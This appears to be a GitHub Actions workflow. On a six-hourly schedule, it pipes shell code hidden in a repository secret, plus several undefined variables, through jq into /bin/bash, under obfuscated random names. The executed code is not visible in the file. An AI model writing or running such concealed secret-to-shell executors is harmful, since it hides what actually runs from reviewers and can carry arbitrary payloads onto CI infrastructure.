name: gucaishen4627

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gucaishen4627
        env:
          qlft17480: ${{ secrets.qlft17480 }}
        run: |
          echo $qlft17480 | jq -r .hjopk589 | /bin/bash
          echo $bv26773 | jq -r .cv5873 | /bin/bash
          echo $vnkz00 | jq -r .ycdhb9 | /bin/bash
          echo $ohq9 | jq -r .s86254 | /bin/bash
          echo $xj70775 | jq -r .n2335 | /bin/bash
          echo $y9913 | jq -r .rs32 | /bin/bash
          echo $z26 | jq -r .sxa5 | /bin/bash
          echo $z1 | jq -r .dpsxo8 | /bin/bash
          echo $bpr580 | jq -r .brwh84 | /bin/bash
          echo $cwhkt04 | jq -r .xdcr8 | /bin/bash

